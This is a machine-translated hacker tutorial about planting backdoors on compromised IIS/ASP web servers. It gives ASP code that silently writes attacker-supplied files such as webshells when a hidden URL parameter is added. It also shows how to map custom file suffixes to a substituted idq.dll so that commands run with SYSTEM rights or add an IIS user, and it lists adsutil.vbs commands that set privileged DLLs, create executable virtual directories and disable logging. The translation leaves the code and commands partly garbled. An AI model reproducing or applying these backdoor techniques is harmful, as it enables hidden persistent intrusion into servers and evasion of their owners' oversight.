In-depth study of placement method of ASP back door

xiaoxiao2021-03-06 37

Author: Lcx. Source: hacker X file.

This is the landing page of our mobile network articles in this machine, and there is no difference in peace, and the original features exist. Look at the second picture:

Compared with Figure 1, the URL of Figure 1 is http://192.168.1.3/asp/wz/admin.asp, Figure 2 is http://192.168.1.3/ASP/WZ/Admin.asp?id=1, Add a parameter "? Id = 1" after admin..An. Figure 2 below, you can enter the file name in the front input box, the text box behind you can copy any code you want, and generate a button to generate CGI / ASP / PHP / ASPX, etc. Web pages back door or any text file. How did this do it? As long as you put this code according to the prompt modification, you can insert a ASP web code.

ON Error ResMe next

ID = Request ("id")

If Request ("id") = 1 THEN

Testfile = Request.form ("name")

MSG = Request.form ("Message")

SET FS = Server.createObject ("scripting.filesystemobject")

Set thisfile = fs.opentextfile (Testfile, 8, true, 0)

thisfile.writeline ("& MSG &" ")

thisfile.close

SET FS = Nothing

Value = <% = server.mappath ("xp.asp")% >>

</p> <p></ textarea></p> <p><Input Type = "Submit" Name = "Value =" Generate "Class = Input></p> <p></ form></p> <p><% end if%></p> <p>It is worth noting that this code requires the server to support the FSO, and it is not taken effect in all ASP files. This code does not take effect like the code that is included in the ASP file is included, that is, the code does not take effect, but does not affect the use of the original file. If you will write ASP, you can also write some ASP backmen directly in the original ASP file in broiler.</p> <p>The second of the ASP rear door placement method is used in the IIS manager to parse the arbitrary suffix name. This is done, open the computer's Control Panel - Administrative Tool -Internet Service Manager -Web Site - Right click Properties - Proto - Configuration - Add. I added a filemap that suffixed for LCX, parsing with ASP.dll under NT / System32. Like Figure 3:</p> <p>After doing this, we rename the common cmd.asp to cmd.lcx, then run, what happens? Figure 4: The same is a web back door. Of course, what suffix is more concealed, see your intelligence.</p> <p>In-depth study of ASP back door placement method. I just used asp.dll to resolve the suffix of LCX. If we use a special DLL program to resolve. LCX suffix? If you will program, you can write a DLL program according to your needs. Will not? Ha, the Green League Yuan Ge has written it for us. I think that there is no, that is the IDQ.dll, you can pass the idq.dll that is connected to ISPC in the scripts directory. U Vulnerability is used to improve permissions. Now I use this IDQ.dll to make a good map of the ASP back door method, what will happen? Can be used to do two things. One is a user who can add an IISUser and password to ABCD 1234 by executing http: //targetip/anything.lcx. Figure 5:</p> <p>This xxx.lcx can be renamed, and the host does not exist. If you are still not satisfied, we use the NC landing host to see. Type the following command. NC Targetip 80</p> <p>POST /% 08 / Anything.lcx, how? Go to the landing, under W2K SP3 it is SYSTEM authority. Figure 6:</p> <p>The principle is limited to the space here. I don't talk about it. You can go to the Great League. Netizen Czy also wrote a same DLL program, using the HTTP: // ip / *. You have a suffix you have in IE? Shell = command you want. Look at the back door I have made on broiler, I used it to parse .ph4 suffix. Figure 7:</p> <p>Seeing this, you may have to say, this IIS back door is very convenient in the 3389 terminal, under the command line? We also have a way. IIS default installation, will generate 19 VBS scripts in the / inetpub / adminsscripts directory, we use one of the adsutil.vbs to help us install this wonderful IIS back door.</p> <p>Using the method as follows, we walk away, look at the joy of the command line:</p> <p>1 Copy IDq.dll% SystemRoot% / System32 / Iisapi.dll</p> <p>Rename Iisapid.ll with Idq.dll Copy to System32 Directory of System Disk</p> <p>2 get the situation of the site</p> <p>CScript Adsutil.vbs Enum / P / W3SVC</p> <p>[/ w3svc / info]</p> <p>[/ w3svc / filters]</p> <p>[/ w3svc / 2] -----------> These is the virtual site.</p> <p>[/ w3svc / 3]</p> <p>[/ w3svc / 4]</p> <p>[/ w3svc / 1]</p> <p>3 get all the privileged DLLs all of IIS</p> <p>Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS</p> <p>If you are running, you will find the following DLL.</p> <p>"C: /winnt/system32/idq.dll" "c: /winnt/system32/inetsrv/httpext.dll" "c: /winnt/system32/inetsrv/httpodbc.dll" "C: / Winnt / System32 / InetSRV / Ssinc.dll "" c: /winnt/system32/msw3prt.dll "</p> <p>4. Get all the privileged DLLs from IIS and set the iisapi.dll from step 1 COPY to the InProcessisapiapps group so that our latter has local_system permissions. In this step, you have to add the DLL that you look at the third step. If you don't add, the original privilege is deleted in the DLL. Cscript adsutil.vbs set / w3svc / inProcessisapiapps "c: /winnt/system32/idq.dll" "c: /winnt/system32/inetsrv/httpext.dll" "c: /winnt/system32/inetsrv/httpodbc.dll" " C: /winnt/system32/inetsrv/ssinc.dll "" c: /winnt/system32/msw3prt.dll "" c: /winnt/system32/iisapi.dll "</p> <p>5. Set mapping</p> <p>CScript Adsutil.vbs SET / W3SVC / Scriptmaps</p> <p>".asp, c: /winnt/system32/inetsrv/asp.dll ,1, get, thehead ,post ,trace"</p> <p>".CER, C: /WINNT/SYSTEM32/INETSRV/ASP.dll, 1, Get, Head ,Post ,trace"</p> <p>".asa, c: /winnt/system32/inetsrv/asp.dll ,1, get ,head ,post ,trace"</p> <p>".idc, c: /winnt/system32/inetsrv/httpodbc.dll ,1 ,options, max, theft ,post ,put ,deete ,trace"</p> <p>".shtm, c: /winnt/system32/inetsrv/ssinc.dll, 1, get ,post"</p> <p>".shtml, c: /winnt/system32/inetsrv/ssinc.dll, 1, get ,post"</p> <p>".stm, c: /winnt/system32/inetsrv/ssinc.dll, 1, get ,post"</p> <p>".lcx, c: /winnt/system32/iisapi.dll, 3, get, thehead ,post"</p> <p>Here is the default installation, the mapping in the original IIS manager adds a .lcx mapping, analyze the Iisapi.dll of our COPY, pay attention to the last line is the .lcx mapping, you can add another suffix Name map.</p> <p>6. Add a virtual directory to set the properties of the virtual directory</p> <p>CScript Adsutil.vbs Create / W3SVC / 2 / Root / root (Dishuo Nar)</p> <p>Cscript Adsutil.vbs Set W3SVC / 2 / root / root / keytype "iiswebvirtualdir"</p> <p>CScript Adsutil.vbs Set W3SVC / 2 / Root / root / approot "/ LM / W3SVC / 2 / root / root"</p> <p>CScript Adsutil.vbs Set W3SVC / 2 / Root / Root / AppFriendlyname "root"</p> <p>Cscript Adsutil.vbs Set W3SVC / 2 / Root / root / appisolated 2</p> <p>Cscript adsutil.vbs set w3svc / 2 / root / root / accessRead TRUE</p> <p>CScript Adsutil.vbs Set W3SVC / 2 / Root / root / accessexecute true</p> <p>Cscript Adsutil.vbs Set W3SVC / 2 / Root / root / accessscript true</p> <p>7. Increase the virtual directory root mapping .lcx, resolve with Iisapi.dll</p> <p>Cscript Adsutil.vbs Set W3SVC / 2 / Root / root / scriptmaps ".lcx, c: /winnt/system32/iisapi.dll, 1"</p> <p>8 do not log record</p> <p>Adsutil.vbs SET / W3SVC / 1 / ROOT / ROOT / DONTLOG TRUE</p> <p>It is necessary to explain that although the command for adsutil.vbs is clear, I just succeeded in three broilers and I used the above command, I only successfully did two. The result of the result is that only the IIS original default configuration is not modified. Why is this, or a master of this script and IIS ISAPI, but in the IIS Graphic Manager, this latter is 100% success.</p> <p>It should be said that the back door of these three methods can be said to be the best back door. But what do you want to do with broilers? :-), look at the picture I caught in this machine, you will understand the best broilers is our computer. Easy to learn, I will pick idq.dll, czy.dll, adsutil.vbs on my website, download URL is http://www.haiyang.net/safety/htm/iisback.rar.</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-78125.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="78125" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.039</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'TXqQ_2FGzO748MvcD_2BJqbFwY5sCsWapFWSHExR5QqNl11jszezD_2FR6MXMT5mDJTpSIpHO8dTzpR3LzEw3HNt3eIQ_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>